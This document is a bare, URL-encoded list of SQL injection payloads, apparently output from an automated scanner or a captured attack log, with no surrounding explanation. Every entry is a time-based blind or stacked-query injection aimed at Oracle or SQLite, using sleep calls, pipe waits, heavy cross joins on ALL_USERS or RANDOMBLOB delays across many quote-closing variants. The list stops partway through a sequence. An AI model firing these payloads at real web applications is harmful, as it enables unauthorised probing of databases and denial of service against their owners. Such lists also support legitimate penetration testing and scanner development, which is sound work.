foo%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%282037%3D2037 foo%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%282313%3D2313 foo%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B-- foo%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%27dgwU%27%3D%27dgwU foo%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%27NObM%27%3D%27NObM foo%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%27wyPn%27%3D%27wyPn foo%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%27PlyI%27%3D%27PlyI foo%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%27rEHD%27%20LIKE%20%27rEHD foo%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%27VerN%27%20LIKE%20%27VerN foo%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%27TkTY%27%20LIKE%20%27TkTY foo%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%27ApVR%27%20LIKE%20%27ApVR foo%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%22uThI%22%3D%22uThI foo%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%22PlAo%22%3D%22PlAo foo%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%22awpk%22%3D%22awpk foo%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%22eRwj%22%3D%22eRwj foo%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%22rRyn%22%20LIKE%20%22rRyn foo%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%22rjTa%22%20LIKE%20%22rjTa foo%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%22Rnik%22%20LIKE%20%22Rnik foo%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%22pLQK%22%20LIKE%20%22pLQK foo%29%20WHERE%207048%3D7048%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B-- foo%27%29%20WHERE%203746%3D3746%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B-- foo%27%20WHERE%209023%3D9023%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B-- foo%22%20WHERE%203395%3D3395%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B-- foo%27%20%7C%7C%20%28SELECT%202919%20FROM%20DUAL%20WHERE%208120%3D8120%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202301%20WHERE%203572%3D3572%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%201358%20FROM%20DUAL%20WHERE%206616%3D6616%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20%29 foo%20%2B%20%28SELECT%205361%20WHERE%202183%3D2183%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20%29 foo%27%20%2B%20%28SELECT%20%27hKvc%27%20FROM%20DUAL%20WHERE%203413%3D3413%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27apvX%27%20WHERE%209851%3D9851%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20%23 foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%289098%3D9098 foo%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%287803%3D7803 foo%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%281785%3D1785 foo%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%27Xfjh%27%3D%27Xfjh foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%27hRHr%27%3D%27hRHr foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%27ZkRr%27%3D%27ZkRr foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%27hYML%27%3D%27hYML foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%27bdlU%27%20LIKE%20%27bdlU foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%27esDt%27%20LIKE%20%27esDt foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%27iBUl%27%20LIKE%20%27iBUl foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%27JcWY%27%20LIKE%20%27JcWY foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%22dujz%22%3D%22dujz foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%22nTaw%22%3D%22nTaw foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%22iaqx%22%3D%22iaqx foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%22rmvb%22%3D%22rmvb foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%22QXXu%22%20LIKE%20%22QXXu foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%22WmjL%22%20LIKE%20%22WmjL foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%22xtKT%22%20LIKE%20%22xtKT foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%22RPlJ%22%20LIKE%20%22RPlJ foo%29%20WHERE%209439%3D9439%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- foo%27%29%20WHERE%204021%3D4021%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- foo%27%20WHERE%204037%3D4037%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- foo%22%20WHERE%208670%3D8670%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- foo%27%20%7C%7C%20%28SELECT%208163%20FROM%20DUAL%20WHERE%202523%3D2523%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%205658%20WHERE%207262%3D7262%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%207428%20FROM%20DUAL%20WHERE%203284%3D3284%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29 foo%20%2B%20%28SELECT%206685%20WHERE%204733%3D4733%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29 foo%27%20%2B%20%28SELECT%20%27HStu%27%20FROM%20DUAL%20WHERE%209815%3D9815%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27KhCZ%27%20WHERE%205766%3D5766%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%23 foo%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- foo%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- foo%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%287055%3D7055 foo%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%288928%3D8928 foo%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%288410%3D8410 foo%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27sUNR%27%3D%27sUNR foo%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27ofTR%27%3D%27ofTR foo%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27wRCo%27%3D%27wRCo foo%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27ZGxw%27%3D%27ZGxw foo%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27mmYn%27%20LIKE%20%27mmYn foo%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27EWnW%27%20LIKE%20%27EWnW foo%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27vmuA%27%20LIKE%20%27vmuA foo%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27dvpm%27%20LIKE%20%27dvpm foo%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22UGTS%22%3D%22UGTS foo%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22fhsG%22%3D%22fhsG foo%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22eJtN%22%3D%22eJtN foo%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22kVvV%22%3D%22kVvV foo%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22EFjx%22%20LIKE%20%22EFjx foo%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22BFhX%22%20LIKE%20%22BFhX foo%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22KFge%22%20LIKE%20%22KFge foo%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22wTtf%22%20LIKE%20%22wTtf foo%29%20WHERE%203122%3D3122%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%29%20WHERE%208363%3D8363%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%20WHERE%201452%3D1452%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- foo%22%20WHERE%202613%3D2613%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%20%7C%7C%20%28SELECT%201402%20FROM%20DUAL%20WHERE%204812%3D4812%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%207207%20WHERE%204519%3D4519%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%203587%20FROM%20DUAL%20WHERE%206083%3D6083%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 foo%20%2B%20%28SELECT%203115%20WHERE%202243%3D2243%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 foo%27%20%2B%20%28SELECT%20%27vFUI%27%20FROM%20DUAL%20WHERE%209152%3D9152%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27CnHC%27%20WHERE%209915%3D9915%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%23 foo%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- foo%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- foo%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%286638%3D6638 foo%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%282013%3D2013 foo%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%281280%3D1280 foo%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27oCZQ%27%3D%27oCZQ foo%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27Onih%27%3D%27Onih foo%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27efTY%27%3D%27efTY foo%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27cWjo%27%3D%27cWjo foo%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27GWKl%27%20LIKE%20%27GWKl foo%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27KBkZ%27%20LIKE%20%27KBkZ foo%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27mSkh%27%20LIKE%20%27mSkh foo%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27XNbS%27%20LIKE%20%27XNbS foo%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22YAux%22%3D%22YAux foo%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22FxVC%22%3D%22FxVC foo%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22jKxv%22%3D%22jKxv foo%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22GMSr%22%3D%22GMSr foo%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22cLQU%22%20LIKE%20%22cLQU foo%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22EewS%22%20LIKE%20%22EewS foo%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22CqJF%22%20LIKE%20%22CqJF foo%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22Lvdy%22%20LIKE%20%22Lvdy foo%29%20WHERE%204757%3D4757%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%29%20WHERE%206094%3D6094%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%20WHERE%202055%3D2055%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- foo%22%20WHERE%207395%3D7395%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- foo%27%20%7C%7C%20%28SELECT%207167%20FROM%20DUAL%20WHERE%208073%3D8073%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208187%20WHERE%204580%3D4580%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%205611%20FROM%20DUAL%20WHERE%208809%3D8809%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 foo%20%2B%20%28SELECT%203372%20WHERE%203789%3D3789%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 foo%27%20%2B%20%28SELECT%20%27Htwm%27%20FROM%20DUAL%20WHERE%209273%3D9273%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27ZKvr%27%20WHERE%206190%3D6190%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20%23 foo%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- foo%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- foo%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- foo%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- foo%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%282738%3D2738 foo%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%289901%3D9901 foo%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%286871%3D6871 foo%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- foo%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%27rLHv%27%3D%27rLHv foo%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%27Czhg%27%3D%27Czhg foo%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%27FkFO%27%3D%27FkFO foo%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%27kEbj%27%3D%27kEbj foo%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%27mQSS%27%20LIKE%20%27mQSS foo%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%27bjXS%27%20LIKE%20%27bjXS 